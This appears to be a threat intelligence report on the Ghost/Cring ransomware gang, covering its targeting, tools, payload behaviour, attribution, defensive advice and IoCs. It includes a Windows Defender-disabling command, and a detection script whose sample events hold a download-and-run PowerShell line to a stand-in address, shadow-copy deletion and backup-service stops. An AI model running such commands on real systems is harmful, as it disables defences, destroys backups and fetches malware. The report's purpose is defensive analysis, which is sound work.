New Insights on the Ghost Ransomware Gang and their Peculiar Success
This cyber threat intelligence investigation hunts ghosts - seeking to answer why the Ghost/Cring ransomware gang is so successful at eluding security researchers and being profitable, especially when they avoid phishing in favor of targeting known vulnerabilities in internet-facing systems.

Created by SirPicklJohn (Ayden Parsons)


Why is the Ghost Ransomware Gang, in particular, so successful?
Introduction
I'm proud to present you with extensive insights and information, including original findings not included in the latest FBI/CISA/MS-ISAC advisory, on the Ghost/Cring ransomware gang! While reading articles on the group, I had one burning question that formed the basis of my following investigation:
Why is the Ghost ransomware gang, in particular, so effective and successful, especially if they are only exploiting old, known vulnerabilities?
For context, on February 19th, 2025, the FBI and CISA released a joint cybersecurity advisory on the Ghost (also known as Cring) ransomware gang (linked here). Reports and news articles say that Ghost has victims in over 70 countries, specifically exploits internet-facing applications/devices with known and unpatched vulnerabilities (some over a decade old!), and is also known as Cring, Cring Hand, RSA Virus, Crypt3r, Phantom, Strike, Hello, Wickrme, HsHarada, and Rapture (you will see why this group goes by so many different names - attribution has been incredibly difficult).
For the most intriguing and important part of my investigation, skip to the "What Makes Ghost Uniquely Successful?" section.
What Does Ghost Do Differently? How Does It Compare To Other Gangs?
First, Ghost has some direct contradictions to the typical tactics, techniques, and procedures (TTPs) of other modern ransomware gangs:
- Limited Data Exfiltration: Ghost threatens double-extortion (i.e., ransoming and threatening to leak stolen data), but there is no evidence suggesting that they actually exfiltrate that much data. When Ghost exfiltrates data, it has reportedly always been under 100 gigabytes (which, considering the amount of data that modern companies routinely store and process now, is not much). It is common behavior for ransomware gangs to regularly exfiltrate and leak terabytes of data, and sometimes, they even threaten triple extortion (which involves making threats directly to the end-users [students, patients, parents, etc.] who have had their data compromised in order to put pressure on the compromised organization to pay the ransom). However, Ghost primarily focuses on encrypting and ransoming their victims' data, targeting networks with less-robust security mechanisms, and severely impeding the victim's ability to defend, respond to, and recover from the attack.
- Inconsistency and Fluidity: Ghost does not limit itself to a set of defined ransomware payloads, file extensions, ransom notes, or ransom contact email addresses. Ghost has used the Cring.exe, Ghost.exe, Elysium0.exe, Elysium.exe, ip.txt (disguised EXE), NoNet.txt (disguised EXE), and Locker.exe executable ransomware payloads before, at least 9-26+ different encrypted file extensions, at least 9 different ransom notes, and at least 41 different email addresses used to contact them. See the "Aggregated IoCs" section at the end of this report for these lists.
- Minimal and Short Persistence, If Any At All: The FBI/CISA report detailed that "[p]ersistence is not a major focus for Ghost actors, as they typically only spend a few days on victim networks. In multiple instances, they have been observed proceeding from initial compromise to the deployment of ransomware within the same day". While this led me to believe that Ghost was unique for this speed, the "Time-To-Ransom" (TTR) measurement (i.e., the time it takes ransomware operators to deploy ransomware after initially gaining access) has actually been dropping among ransomware groups over the past few years. Thus, while Ghost is not particularly fast or slow when comparing their TTR with higher-profile ransomware gangs (which is a hard comparison to make, particularly as the FBI/CISA report does not give specific statistics, and interpreting those statistics definitively is difficult or impossible), it is still massively useful for security personnel to know that ransomware is trending towards ultra-low (<2 days) TTRs.
- Statistics to Support This: From 2022-2023, a frequently-cited Secureworks/Sophos report found that the median dwell time of ransomware operators had dropped from 4.5 days to just 1 day, with 10% of cases showing an even smaller dwell time of only five hours (linked source). Throughout 2024, Huntress Labs found that the average TTR of ransomware groups was 16.88 hours (ranging from an average of 4.22 to 43.42 hours, depending on whether the group preferred a slow and deliberate approach or a rapid smash-and-grab one) (article link, direct PDF link).
- Lack of Domain Registration: Ghost is not known to register domains; instead, they hardcode their C2 server's address in their payloads to download and execute Cobalt Strike Beacon malware. This is likely due to the short-lived nature/TTR of Ghost's operations, the desire not to leave a digital footprint, and the fact that Ghost does not typically use social engineering attacks or lookalike phishing domains to compromise its victims.
- Specifically Exploiting Known Vulnerabilities in Public-Facing Applications and Devices: While the earliest ransomware payloads from Cring (before it was known as Ghost) sometimes used phishing-based methods of delivery, at least according to old and potentially unreliable or generalized forums, the FBI and CISA have found that Ghost rarely uses the social engineering or phishing tactics that are ubiquitous amongst cybercriminals and ransomware operators. Ghost strongly prefers to target only known, unpatched vulnerabilities in public-facing applications and devices, such as firewalls, RDP (port 3389), FortiGate VPN gateways, SMB (port 445), FTP (port 21), and end-of-life ColdFusion servers. The following CVEs are known to be exploited by Ghost:
- CVE-2018-13379
- CVE-2009-3960
- CVE-2010-2861
- CVE-2019-0604
- CVE-2019-5591 (source: Japanese Trend Micro Report)
- CVE-2020-12812 (source: Japanese Trend Micro Report)
- CVE-2021-34473 (Part of ProxyShell Attack Chain)
- CVE-2021-34523 (Part of ProxyShell Attack Chain)
- CVE-2021-31207 (Part of ProxyShell Attack Chain)
- Note that, in the autumn months before Ghost started operations in December 2020, there was a 6.7GB database of FortiGate VPN Gateway devices vulnerable to CVE-2018-13379. Ghost threat actors could have purchased this list, simply scanned IP addresses manually to identify vulnerable devices, or both.
What Makes Ghost Uniquely Successful?
This part of the report formed the crux of my investigation, where I not only sought to answer why Ghost was successful in terms of executing attacks and making a profit, but also in evading detection and making it hard to attribute activity to them - remember, this nebulous gang is known by eleven different names, and there still is a lot that isn't known about them!
My investigation suggested that all of the following factors, especially when working in tandem with each other, massively contribute to Ghost's success in both their profitability and their ability to give researchers and prosecutors a headache:
- Threatening double-extortion, while not actually exfiltrating that much data
- "Moving quickly" by taking mere hours or days to complete infiltration, privilege escalation and lateral movement, and final ransomware deployment
- Tailoring attacks and demands to the victim
- Demanding "reasonable" amounts of cryptocurrency equating to tens to hundreds of thousands of dollars
- Heavily utilizing Cobalt Strike, open-source tools, and native Windows/PowerShell tools and commands
- Short, minimal, or no persistence
- Lack of domain registration
- Defense evasion, disablement, and impersonation, combined with LOTL
- Anti-forensics and anti-system-recovery
- Anti-debugging/anti-reverse engineering
- Inconsistency and fluidity
- Communication via encrypted email services and TOX (P2P, end-to-end encrypted messaging/video)
- Specific targeting:
- Public-facing applications and devices
- Critical infrastructure, schools and universities, healthcare, government, religious institutions, technology and manufacturing, and SMBs
- Avoiding hardened systems, and moving on when segmented networks are encountered that impede lateral movement
- Imitating/being imitated by other ransomware groups
Inconsistency and Fluidity + Imitating (or Being Imitated By?) Other Ransomware
The primary differentiator for Ghost that I immediately noticed was their deliberate inconsistency and rotation of the key elements in their attack chain (having used at least 5 different payloads, 9-26+ encrypted file extensions, 9 different ransom notes, and 41 different email addresses to contact them). This cripples the ability of security professionals to use hashes in their detection mechanisms, and has led to major difficulties in actually tracking and attributing Ghost's attack activity.
To highlight this, see the following screenshot of the thought process of the "discoverer" of Ghost/Cring, Amigo-A (Andrew Ivanov):
Also note the comparison to the Parasite ransomware. Parallels between the two threat actors are as follows (do note that there are likely several errors or "best guesses" made in these analyses. I am including this information to highlight the challenges that have been experienced in attributing activity to Ghost):
- Using Tutanota encrypted emails for communication with clients (as well as several cock.li addresses).
- Deleting volume shadow copies.
- One particular infection used the .vjiszy1lo extension for encrypted files and had a ransom (labelled "HOW_CAN_GET_FILES_BACK.txt") with two emails used by Ghost.
- This blog post (see image below) and this article by Amigo-A, which links several ransom note filenames and several extensions that Ghost is known to use to Parasite.
- The ransomware recovery company Elastio linked the .phantom extension, the "HOW_CAN_GET_FILES_BACK.txt/rtf" ransom note names, "Ghost.exe", and several emails to both Parasite and Ghost (see this link for Elastio's page on Parasite, and this link for the page on Ghost). There are likely errors or a lack of verification in Elastio's assessment, and I suspect they referenced Amigo-A's research/the BleepingComputer forum posts referenced throughout this article.
- These groups developed around the same time (Ghost emerged in December 2020, while Parasite is believed to have emerged January 2021).
Some possible explanations for these parallels are as follows:
- The researchers above could have made mistakes or didn't verify their sources before making these claims.
- Ghost could have links to Parasite, or they could be the same threat actor.
- Ghost and/or Parasite may have purposefully adopted some of the tactics/attributes of the other in order to make attribution harder.
Again, I include this information only to highlight the observed challenges in definitively attributing activity to Ghost.
Defense Evasion, Defense Deactivation, and Tool Choice (Including LOTL)
Another strong component of Ghost's success lies in their defense-evasion techniques. They use encoded PowerShell commands, Windows Command Shell commands, and Windows Management Instrumentation (WMI), all of which are built into Windows systems and are commonly used for IT administration. Additionally, legitimate services like SMB and RDP are abused.
Ghost also heavily relies on Cobalt Strike (which uses HTTP/HTTPS and can blend in with legitimate traffic) and the following set of open source tools:
- IOX - Used as an open-source reverse proxy to a Ghost C2 server from a victim device on the network.
- Exploitation and Lateral Movement:
- Publicly-known and unpatched vulnerabilities that lead to initial access without user interaction
- Ladon 911 - Exploits two EternalBlue vulnerabilities (CVE-2017-0143 and CVE-2017-0144, addressed in advisory MS17-010)
- Enumeration:
- SharpShares.exe
- SpnDump.exe
- NBT.exe
- Privilege Escalation:
- SharpZeroLogon.exe - Used to exploit CVE-2020-1472 (escalation of privilege using MS-NRPC) against a Domain Controller.
- SharpGPPPass.exe - Attempts to exploit CVE-2014-1812
- BadPotato.exe
- God.exe (GodPotato)
- Persistence:
- Web Shell - Executes commands and facilitates persistent access
- Exfiltration:
- HFS (HTTP File Server)
See this list of tools and executables, with more details, in the joint-report from the FBI and CISA [pages 5-6]!
A common Ghost attack chain will include using Cobalt Strike to display a list of all running processes, using that to determine a running antivirus solution on the system, and then using a PowerShell command like the following to disable it (in this case, Windows Defender is being disabled):
Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableBehaviorMonitoring 1 -DisableScriptScanning 1 -DisableIOAVProtection 1 -EnableControlledFolderAccess Disabled -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
However, what about EDR, IDPS, and SIEM? According to an analysis by Vectra.ai (linked here), Ghost's fast operation/TTR, abuse of legitimate applications, lack of long-term persistence, and other detection evasion methods are sufficient to bypass known attack signatures, rule-based detection, and even pattern-analysis/behavioral baselines.
Payload Behavior: Anti-Forensics, Anti-Debugging/RE, and Anti-System Recovery
Ghost's ransomware payloads employ several tactics that make it even harder for security analysts to detect and analyze them, while simultaneously disabling backup and recovery processes. Cross-referencing the MD5 hashes of Ghost's malware (as provided in the CISA/FBI security advisory) with the Hybrid Analysis database revealed the following anti-recovery behaviors:
- Deleting files with the .VHD, .bac, .bak, .sbcat, .bkf, .set, .win, and .dsk extensions, which are all related to backups
- Disabling the system's volume shadow copy service
- Deleting volume shadow copies
- Killing processes related to the Veritas backup solution, such as the BMR Boot Service and NetBackup BMR MTFTP Service
- Killing telemetry processes related to MS SQL Server, allowing database files to be encrypted
Source: Hybrid Analysis Report for c5d712f82d5d37bb284acd4468ab3533 (Cring.exe - labelled in Hybrid Analysis as file)
This sample also exhibited the following evasive mechanisms:
- Exhibiting MITRE ATT&CK technique T1055 (Process Injection) by allocating virtual memory in a separate live process (which could suggest privilege escalation and/or anti-detection behavior).
- Being programmed to sleep (take no action) for 1566804069 milliseconds (approximately 18 days) at some point in its execution, which could indicate anything from detection evasion, to hiding behavior when being analyzed, to facilitating communication with C2 servers (or, of course, something totally innocuous).
- Allocating memory with PAGE_GUARD access rights, which act as a one-time alarm to detect and protect against the memory page being accessed. In the context of malicious software, this could indicate that the malware is protecting from or detecting the usage of a debugger.
Finally, while I didn't see it in this sample, other ransomware payloads that Ghost has used also clear Windows Event Logs, in addition to the above activity.
(MD5 of kill.bat: fe0ccc3a60e1a5b27c055ec36e62e9e0)
Note that, according to Kaspersky's analysis (corroborated with what I saw from the Hybrid Analysis report), Ghost attacks have been observed to occur as follows:
- After gaining initial access, Ghost operators downloaded the "execute.bat" file in a temporary folder.
- "execute.bat" launches a PowerShell command under the name kaspersky, mimicking the antivirus running on the system. This command downloaded a file from a Ghost C2 server and saved it as C:\__output. (Note that, while the downloaded file was called ip.txt, it is actually the executable EXE ransomware payload. When connecting to the malware-hosting C2 server via a web browser, this file had been deleted and replaced with a newer ransomware payload called NoNet.txt.)
- The downloaded malware created a batch file called kill.bat that executed the following series of actions (details stated earlier in this section):
- Stopped backup services (as done in the Hybrid Analysis report earlier).
- Stopped the SstpSvc service that creates VPN connections, making it so system administrators could not connect to the system via VPN and respond in a timely manner.
- Terminated application processes that could hinder file encryption (as done in the Hybrid Analysis report earlier with mspub and Oracle MyDesktop services).
- Deleted locally-stored backup files (as done in the Hybrid Analysis report earlier).
- Deleted itself.
- The malware started encrypting files with AES, with the encryption key in turn being encrypted with a hard-coded RSA public key of 8,192 bits.
- The malware dropped a ransom note.
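The following is an added illustration (my own code, not code from the report, from CISA, or from any vendor) of what a behaviour-based detection for the steps just described could look like. It scans simplified Windows telemetry records (stand-ins for Sysmon process-creation and file-deletion events and PowerShell script-block text) for the Set-MpPreference tampering shown in the "Defense Evasion" section and for the kill.bat-style anti-recovery actions in this section (backup-file deletion, shadow copy deletion, stopping the VSS/SstpSvc/NetBackup services, event log clearing, and a download run under a security product's name), then correlates hits per host so that several of them inside a short window raise an alert without depending on any payload hash. The event records, hostnames, timestamps and the 203.0.113.10 address are constructed; the field names are a simplification, not the real Sysmon or PowerShell schema; the security-product names other than "kaspersky", the one-hour window and the two-category threshold are assumptions.

```python
"""Behaviour-based correlation of the pre-encryption steps described above.

Added illustration, not code from the report, CISA, or any vendor. Records are
simplified stand-ins for Sysmon Event ID 1 (process create), Sysmon Event ID 23
(file delete) and PowerShell Event ID 4104 (script block) telemetry.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

# Backup-related extensions the analysed Cring.exe sample deleted (from the report).
BACKUP_EXTENSIONS = {".vhd", ".bac", ".bak", ".sbcat", ".bkf", ".set", ".win", ".dsk"}
# Services whose stoppage removes recovery or remote-response capability (from the report).
TARGETED_SERVICES = ("vss", "sstpsvc", "bmr boot service", "netbackup bmr mtftp service")
# Process names a loader might borrow from security software. The report describes a
# PowerShell command run under the name "kaspersky"; the other entries are assumptions.
SECURITY_PRODUCT_NAMES = {"kaspersky", "defender", "msmpeng", "sophos", "crowdstrike"}

_SERVICES_RX = "|".join(re.escape(s) for s in TARGETED_SERVICES)
# (category, pattern) pairs matched case-insensitively against a command line or script block.
COMMAND_RULES = [
    ("defender_tamper", re.compile(
        r"set-mppreference\b.*?(-disable\w+\s+(1|\$true)|-mapsreporting\s+disabled"
        r"|-submitsamplesconsent\s+neversend)", re.I)),
    ("shadow_copy_delete", re.compile(
        r"vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("service_stop", re.compile(
        r"(net(\.exe)?\s+stop|sc(\.exe)?\s+stop|stop-service)\s+\"?(" + _SERVICES_RX + r")\b", re.I)),
    ("eventlog_clear", re.compile(r"wevtutil(\.exe)?\s+cl\b|clear-eventlog", re.I)),
]
_DOWNLOAD_RX = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I)


def classify_event(ev):
    """Return the detection categories one telemetry record matches (possibly none)."""
    hits = []
    if ev["kind"] in ("process_create", "powershell_scriptblock"):
        text = ev.get("command_line") or ev.get("script_block") or ""
        hits += [cat for cat, rx in COMMAND_RULES if rx.search(text)]
        # A downloader whose image name borrows a security product's name is masquerading.
        if ev["kind"] == "process_create" and _DOWNLOAD_RX.search(text) \
                and PureWindowsPath(ev["image"]).stem.lower() in SECURITY_PRODUCT_NAMES:
            hits.append("security_tool_masquerade")
    elif ev["kind"] == "file_delete":
        if PureWindowsPath(ev["target"]).suffix.lower() in BACKUP_EXTENSIONS:
            hits.append("backup_file_delete")
    return hits


def correlate(events, window=timedelta(hours=1), min_categories=2):
    """Alert on a host when >= min_categories distinct categories occur within `window`.

    Any one category can be routine administration; a cluster of them in under an hour is
    the pre-encryption pattern the report describes, and it needs no payload hash.
    """
    per_host = defaultdict(list)
    for ev in events:
        for cat in classify_event(ev):
            per_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), cat))
    alerts = []
    for host, hits in per_host.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            in_window = [h for h in hits[i:] if h[0] - t0 <= window]
            cats = sorted({c for _, c in in_window})
            if len(cats) >= min_categories:
                alerts.append({"host": host, "first_seen": t0.isoformat(),
                               "categories": cats, "hit_count": len(in_window)})
                break  # one alert per host is enough for triage
    return {"hits_per_host": {h: [c for _, c in hits] for h, hits in per_host.items()},
            "alerts": alerts}


# Constructed telemetry: hostnames, timestamps and the 203.0.113.10 address are invented.
SAMPLE_EVENTS = [
    {"ts": "2025-03-01T02:10:05", "host": "FS01", "kind": "process_create",
     "image": "C:\\Windows\\Temp\\kaspersky.exe",
     "command_line": "powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://203.0.113.10/ip.txt','C:\\__output')"},
    {"ts": "2025-03-01T02:11:40", "host": "FS01", "kind": "powershell_scriptblock",
     "script_block": "Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIOAVProtection 1 -MAPSReporting Disabled"},
    {"ts": "2025-03-01T02:12:02", "host": "FS01", "kind": "process_create",
     "image": "C:\\Windows\\System32\\cmd.exe",
     "command_line": "cmd /c net stop \"NetBackup BMR MTFTP Service\" & net stop SstpSvc"},
    {"ts": "2025-03-01T02:12:03", "host": "FS01", "kind": "process_create",
     "image": "C:\\Windows\\System32\\vssadmin.exe", "command_line": "vssadmin delete shadows /all /quiet"},
    {"ts": "2025-03-01T02:12:10", "host": "FS01", "kind": "file_delete", "target": "D:\\Backups\\sql-full.bak"},
    {"ts": "2025-03-01T02:12:11", "host": "FS01", "kind": "file_delete", "target": "D:\\Backups\\fileserver.vhd"},
    # Benign noise on another host: an unrelated service stop and a lone .set file deletion.
    {"ts": "2025-03-01T09:00:00", "host": "WS07", "kind": "process_create",
     "image": "C:\\Windows\\System32\\net.exe", "command_line": "net stop Spooler"},
    {"ts": "2025-03-01T09:05:00", "host": "WS07", "kind": "file_delete", "target": "C:\\Users\\alice\\Documents\\layout.set"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS)["alerts"]:
        print(alert)
```

Run against the constructed records, FS01 produces one alert covering five distinct categories within about two minutes, while WS07's lone .set deletion stays below the threshold. The point of the per-host window is the TTR discussed in this report: because the whole chain from downloader to backup deletion can fit inside a few minutes, the correlation window has to be short and the alert has to fire on behaviour, not on a hash of whichever payload name Ghost is using that week.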
Short, Minimal, or No Persistence ("Moving Quickly")
As mentioned earlier, Ghost avoids long-term persistence, and like many other modern and high-performing ransomware gangs, is trending towards a regularly low TTR ("Time-to-Ransom" from initial access) of mere hours or days. This rapid turnaround, combined with the other evasive mechanisms and tactics that Ghost employs, can make it difficult for security tools or analysts to collect and analyze data, detect abnormalities and identify malicious behavior, and then effectively respond.
I thought the following claim in an analysis by Vectra was incredibly thought-provoking:
"Traditional security is too slow - only AI can stop Ghost in time."
Despite being a biased transition into an audacious marketing statement for AI-powered behavioral analysis and automated response, I mention this quote because there is a lot of truth to it, and it uncomfortably paints a very real and developing picture of adversaries that are simply too fast for certain defenses to be effective.
Tailoring Attacks to the Victim and NOT Demanding Millions
Another reason why Ghost is so successful likely lies in how they tailor their attacks to victims on a case-by-case basis, which includes parameters ranging from impersonating the victim's security software (as mentioned earlier in the case study by Kaspersky) to the way they set the price-points of their ransom demands.
According to securityintelligence.com, the average ransom demand in 2024 rose to $2.73 million (from about $1 million in 2023), and the average ransom demand for healthcare organizations exceeded $5.2 million in the first half of 2024 (with high-profile incidents reaching over $20 million). However, there are many organizations that would have a really hard time forking out a million (or several million) dollars at the drop of a hat. Additionally, there are many organizations, like small to medium sized businesses and health practices, that simply would not be able to pay that much on such short notice. Forcing organizations into a corner like this can make them feel like they have no choice but to involve law enforcement and/or not pay the demand. As stated earlier, Ghost specifically demands "more reasonable" payments in the tens to hundreds of thousands of dollars, which organizations can much more readily justify paying.
Additionally, it has been cited that the impact of a Ghost ransomware attack varies significantly on a victim-by-victim basis. These deliberate and surgical attacks (combined with the earlier-mentioned disabling of backup/recovery methods) put victims in a situation where they have a much harder time refusing to pay a ransom.
Specific Targeting
Ghost only targets internet facing applications and devices that have known, unpatched vulnerabilities WHILE avoiding or moving on from segmented networks that prevent lateral movement. The following is a rundown of Ghost's targets:
- Seemingly indiscriminately-targeted VPNs, firewalls, and network appliances.
- All of the sectors that are typically the most profitable and consequential for ransomware operators to target (critical infrastructure, healthcare, schools and universities, government institutions, religious institutions, technology and manufacturing, and small-to-medium-sized businesses).
- Targets residing in 70+ countries. While Ghost is supposedly linked to China (diving more into their origins is out-of-scope of this report), they also target internet-facing Chinese systems all the same.
Communication via Encrypted Email Services and TOX
Most ransomware gangs post an onion link to the dark web (with an access key or username/password login) in their ransom notes (see feeds like ransomlook.io for a list of ransomware gangs and their notes). In Ghost's ransom notes, on the other hand, they typically provide 1-2 email addresses that are registered via encrypted email services like Proton Mail and Tutanota for victims to contact and start the payment/decryption process. A full list of 41 known emails (including 8 not in the FBI/CISA report) linked to Ghost is in the "Aggregated IoCs" section at the end of this report. Additionally, the CISA/FBI report mentioned that Ghost also uses the TOX peer-to-peer, end-to-end encrypted instant messaging and video-calling protocol/application. Some of their known TOX IDs are as follows:
EFE31926F41889DBF6588F27A2EC3A2D7DEF7D2E9E0A1DEFD39B976A49C11F0E19E03998DBDA
E83CD54EAAB0F31040D855E1ED993E2AC92652FF8E8742D3901580339D135C6EBCD71002885B
Using encrypted email services contributes to Ghost's success in various ways:
- End-users will find it much easier to send a simple email, rather than setting up the TOR browser, accessing a .onion link, and logging into a web application.
- Email addresses cannot be hacked, taken over, or monitored like a web application on the Tor network can.
- Using a wide variety of encrypted email addresses makes attribution harder than hosting a .onion site. Additionally, it is easier to create, delete, and maintain email accounts than it is to do the same for web applications/websites on the Tor network.
- While administrators of the encrypted email communication services can take down Ghost's email addresses, it isn't an instantaneous process (typically requiring an abuse report with evidence provided by a victim, and then action taken on the part of the administrators) and doesn't compromise the anonymity of Ghost's operators.
Applications that use the TOX protocol (like qTox) offer similar benefits (and I suspect their peer-to-peer nature eliminates the concern of takedowns by administrators, but I cannot say this definitively because I do not have experience with TOX).
Limited Exfiltration (While Still Threatening Double-Extortion)
As mentioned earlier, Ghost threatens double-extortion, while not actually exfiltrating that much data (under 100 GB). This lends support to Ghost's success for a variety of reasons:
- Threatening double-extortion (leaking data to the public, which no backup solution or action by the victim can prevent after the data has been stolen) puts victims in a difficult position that makes it even more compelling for the ransom to be paid. Even if Ghost doesn't steal a relatively large amount of data as compared to other attacks, organizations still are forced to decide whether they can afford the risk of leakage, especially when they may not know exactly what data was stolen (with the safest assumption being to assume the worst).
- Exfiltration can be a noisy activity, and it is somewhat of an artform. There are many methods and mediums that an adversary can use for exfiltrating data, but exfiltrating less data generally reduces the opportunities for its detection. With Ghost's tendency to exfiltrate less than a hundred gigabytes in their attacks (rather than hundreds to thousands of terabytes, as seen in other attacks), this increases their stealthiness. While it cannot be stated for certain if this is Ghost's intention or not, it is just one of the many factors that either intentionally or coincidentally could help indicate why Ghost is so successful in their operations.
Side Note: Ghost's Nebulous Origins
First off, while many reports and articles say that Ghost was discovered in 2021, including the official FBI/CISA report, evidence shows that Ghost (known primarily as "Cring" back then) has been operating since at least December 9th, 2020, 12:49:07 (with another, less-verifiable source claiming December 7, 2020).
The most important source that corroborates this fact is the following Chinese web forum post:
This is trustworthy because it details one of the verified ransom note filenames ("deReadME!!!") and emails known to be used by Ghost. There are three sources that contain this post:
- https://www.ptt.cc/bbs/AntiVirus/M.1607489351.A.6BE.html
- https://www.webptt.com/cn.aspx?n=bbs/AntiVirus/M.1607489351.A.6BE.html
- http://www.ucptt.com/article/AntiVirus/1607489351/6BE (Note that this website does not support HTTPS)
Additionally, the following sources corroborate the start of Ghost's operations being in early December of 2020:
- The cited "discoverer" of the Ghost (back then known as Cring) ransomware, Amigo-A (Andrew Ivanov), stated this in both a forum post and his blog on the Ghost gang:
- "Активность этого крипто-вымогателя пришлась начало декабря 2020 - середину января 2021 г...Согласно информации от пострадавших от 7 декабря 2020, ранняя версия шифровала только файлы DOC и TXT." (source of blog excerpt)
- Translation by Reverso Context: "The activity of this crypto-extortionist occurred in early December 2020 - mid-January 2021. Aimed at English-speaking users, can spread around the world. It is reported that the victims of these attacks are industrial enterprises in some countries of Europe...According to information from the victims of December 7, 2020, the earlier version encrypted only DOC and TXT files."
- A report by Kaspersky that states the release date of the Cring ransomware family to be December 2020 (linked here).
How to Combat Ghost (Security Recommendations)
Recommended actions from CISA and Kaspersky:
- Make sure the components of all (endpoint) security solutions are enabled
- Implement network segmentation (e.g., via VLANs) to restrict lateral movement
- Keep the following fully updated:
- Internet-facing applications
- Antimalware databases
- Implement the principle of least privilege:
- Make Active Directory policies that allow users to only log into the workstations they need to
- Block connections to industrial systems that are not required by the industrial process
- Store backups on a system that is different than the one the backup is for
- Implement EDR-type solutions on all endpoints in all networks
- Implement advanced security solutions:
- Consider MDR/managed security solutions to leverage the knowledge and expertise of high-level security professionals
- Consider implementing (AI) behavioral analysis
- Implement allowlisting/whitelisting for applications, scripts, and network traffic
- Disable unnecessary ports
- Implement anti-phishing techniques (implement phishing-resistant MFA, a strong security education and awareness training program, and advanced email filtering)
My security recommendations that stem from the above research:
- Retire end-of-life servers, devices, and applications
- Periodically audit for out-of-date systems, for those not configured to receive auto-updates, and for those that are missing hardened security configurations
- Implement tamper protection on endpoint security solutions, if applicable
- Backup/aggregate local endpoint logs in a hardened centralized logging system
- Consider implementing behavioral analysis solutions
- Block PowerShell on computers that don't need it, at least flagging its usage on computers with users that don't need it
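As an added example of turning the "disable unnecessary ports" and periodic-audit items above into a repeatable check (my own illustration, not code from the report, CISA or Kaspersky), the script below reads an inbound firewall rule set and reports every allow-rule that exposes RDP (3389), SMB (445) or FTP (21), the services named earlier as Ghost's preferred entry points, to a source range outside RFC 1918 private space. The rule format, rule names and address ranges are constructed; the script assumes a flat list of rules and deliberately ignores first-match ordering between allow and deny rules.

```python
"""Inbound-exposure audit for the services named in the recommendations above.

Added example, not from the report, CISA or Kaspersky. It flags allow-rules that expose
RDP, SMB or FTP to sources outside RFC 1918 space, so "disable unnecessary ports" is
checked against the actual rule set. The rule fields and sample rules are constructed.
"""
import ipaddress

# Services the report names as Ghost's preferred internet-facing initial-access targets.
RISKY_PORTS = {3389: "RDP", 445: "SMB", 21: "FTP"}
RFC1918 = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def source_is_external(src):
    """True unless the whole source range lies inside RFC 1918 private space."""
    if src.strip().lower() in ("any", "*"):
        return True
    net = ipaddress.ip_network(src, strict=False)
    return not any(net.version == block.version and net.subnet_of(block) for block in RFC1918)


def parse_ports(spec):
    """'3389' -> {3389}; '20-21,3389' -> {20, 21, 3389}; 'any' -> None (every port)."""
    spec = spec.strip().lower()
    if spec in ("any", "*"):
        return None
    ports = set()
    for part in spec.split(","):
        lo, _, hi = part.strip().partition("-")
        lo, hi = int(lo), int(hi or lo)
        ports.update(range(lo, hi + 1))
    return ports


def exposed_risky_services(rule):
    """Risky services (by name) that one allow-rule exposes to external sources."""
    if rule["action"].lower() != "allow" or not source_is_external(rule["src"]):
        return []
    ports = parse_ports(rule["dst_port"])
    return [name for port, name in sorted(RISKY_PORTS.items()) if ports is None or port in ports]


def audit(rules):
    """One finding per rule that exposes a risky service; rule order is ignored (see note)."""
    findings = []
    for rule in rules:
        services = exposed_risky_services(rule)
        if services:
            findings.append({"rule": rule["name"], "src": rule["src"], "services": services})
    return findings


# Constructed rule set; 198.51.100.0/24 is a documentation range standing in for a partner network.
SAMPLE_RULES = [
    {"name": "allow-rdp-from-vpn", "src": "10.20.0.0/16", "dst_port": "3389", "proto": "tcp", "action": "allow"},
    {"name": "legacy-ftp-upload", "src": "any", "dst_port": "21", "proto": "tcp", "action": "allow"},
    {"name": "branch-smb", "src": "198.51.100.0/24", "dst_port": "445", "proto": "tcp", "action": "allow"},
    {"name": "block-all-smb", "src": "any", "dst_port": "445", "proto": "tcp", "action": "deny"},
    {"name": "web", "src": "any", "dst_port": "80-443", "proto": "tcp", "action": "allow"},
    {"name": "old-rdp-any", "src": "0.0.0.0/0", "dst_port": "3000-4000", "proto": "tcp", "action": "allow"},
]

if __name__ == "__main__":
    for finding in audit(SAMPLE_RULES):
        print(finding)
```

On the constructed rule set this reports the FTP rule open to the world, the SMB rule open to a non-private partner range, and the wide "3000-4000" range that quietly includes RDP. Two caveats apply when adapting it: a real firewall evaluates rules in order, so a broad deny placed before an allow would neutralise a finding this script still reports, and a rule is only exposure if the destination is actually reachable from the internet, which is why the output is a list to review rather than an automatic verdict.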
IoCs
Names:
- Ghost
- Cring
- Cring Hand
- Crypt3r
- Phantom
- Strike
- Hello
- Wickrme
- HsHarada
- Rapture
- RSA Virus
Contact Emails
For disclosure: the 33 emails provided in the CISA/FBI report are assumed to be verified. The above list is 41 emails large.
Services: Tutanota/Tutamail/Tuta.io, Skiff, Mailfence, OnionMail, ProtonMail, and potentially one from Cock.li
Payloads:
- Verified:
- cring.exe
- Ghost.exe
- Elysium0.exe
- Elysium.exe
- Locker.exe
- file.exe
- iex.txt, pro.txt (listed as IOX proxy IoCs from CISA)
- ip.txt
- NoNet.txt
- C:\__output.txt
- "Helper" Files:
- execute.bat
- kill.bat
- Unverified (and associated with the Parasite ransomware as well):
- 848299.exe
- SchoolPrject1.exe
Extensions
Verified:
- .cring
- .ghosts
- .RSA / .rsa
- .vjiszy1lo
- .phantom
- .VnBeHa99y
- Note: Verified from verified emails in the ransom note.
- .just4money
- .jpghosts
- Note: Verified from being associated in a forum with an attack that used a verified ransom note (HOW_CAN_GET_FILES_BACK.rtf).
- .pay4it
Semi-Verified (based off of the verified email address with the same name):
- .sg-ghosts
- .sgghosts
Unverified (but associated with an unverified/unverifiable source that has verified information):
- .BeHappy
- .D0ntW0rry
- .GetMoney
- .Gets
- .KrB3Ha99y
- .KrDontCry <- note that a Hybrid Analysis heuristics text match in an analysis of cring.exe has the message "DontCry :)"
- .Spanishghost
- .Welcomeghost
- .dkghost
